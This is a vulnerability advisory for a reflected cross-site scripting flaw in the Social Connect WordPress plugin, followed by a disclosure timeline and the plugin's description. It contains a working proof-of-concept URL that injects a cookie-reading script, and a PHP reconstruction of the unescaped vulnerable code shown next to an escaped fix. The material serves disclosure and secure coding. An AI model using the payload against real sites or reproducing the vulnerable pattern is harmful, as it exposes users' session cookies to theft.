Plugin Details
Plugin Name: wp-plugin : social-connect
Affected Version : 1.0.4 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/social-connect/diagnostics/test.php?testing=testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
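The PoC above reflects the `testing` query parameter of diagnostics/test.php straight into the response, and the leading `'>` in the payload suggests the value lands inside a single-quoted HTML attribute. The following is an added example, not the plugin's source: it reconstructs that assumed vulnerable pattern next to a hardened version that applies contextual output escaping, and checks both against the decoded PoC payload. The function names and the attribute context are assumptions made for illustration.

```php
<?php
// Added example; not code from the Social Connect plugin.
// Assumed vulnerable pattern: the diagnostics page echoes the `testing`
// parameter into a single-quoted attribute without escaping.
function render_diagnostic_vulnerable(array $get): string
{
    $value = $get['testing'] ?? '';
    // Raw reflection: a quote in the input closes the attribute, and the
    // rest of the payload is parsed as markup.
    return "<input type='text' name='testing' value='" . $value . "'>";
}

// Hardened form: escape for the attribute context at output time.
// esc_attr() is the WordPress helper; outside WordPress (e.g. running this
// file from the CLI) fall back to htmlspecialchars with ENT_QUOTES so that
// both ' and " are encoded.
function escape_attr(string $value): string
{
    if (function_exists('esc_attr')) {
        return esc_attr($value);
    }
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_diagnostic_hardened(array $get): string
{
    $value = $get['testing'] ?? '';
    return '<input type="text" name="testing" value="' . escape_attr($value) . '">';
}

// Self-check using the decoded payload from the advisory's PoC URL.
$payload = rawurldecode('testing%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E');

$vulnerable = render_diagnostic_vulnerable(['testing' => $payload]);
$hardened   = render_diagnostic_hardened(['testing' => $payload]);

// The unescaped render contains a live <script> element; the escaped one
// only contains &lt;script&gt; text inside the attribute value.
assert(strpos($vulnerable, '<script>') !== false);
assert(strpos($hardened, '<script>') === false);
assert(strpos($hardened, '&lt;script&gt;') !== false);

echo "vulnerable: $vulnerable\n";
echo "hardened:   $hardened\n";
```

Two points a reviewer of this plugin would want on record: escaping has to match the output context (attribute here, so `esc_attr()`; `esc_html()` for element text; `esc_url()` for hrefs), and a diagnostics script that is reachable without authentication should not ship in the release package at all, or should at least be gated behind `current_user_can('manage_options')` and a nonce, independently of the escaping fix.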
Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4551
Plugin Description :
Social Connect adds social login buttons on the login, register and comment forms of your WordPress site.
The buttons offer login and registration using a Twitter, Facebook, Google, Yahoo or WordPress.com account.
It makes it super easy for new members to register with your site and existing members to login.
= Props =
Special thanks to:
* [markusdrake](http://wordpress.org/support/profile/markusdrake) for patches and helping in the support forums;
* [L D](http://wordpress.org/support/profile/enochfung) for patches and helping in the support forums;
* [Geodanny](http://wordpress.org/support/profile/geodanny) for helping in the support forums; and
* [Wirone](http://blog.wirone.info/) for Polish translation and patches.
And everyone else in the forums sharing the fixes they find and answering each other's questions.
= Contribute =
Social Connect is rapidly growing in popularity and help with the growing pains is appreciated.
If you're a developer, you can contribute fixes & optimisations via [Social Connect on GitHub](https://github.com/thenbrent/social-connect).
Everyone can help out by answering questions in the [Support Forums](http://wordpress.org/tags/social-connect?forum_id=10#postform).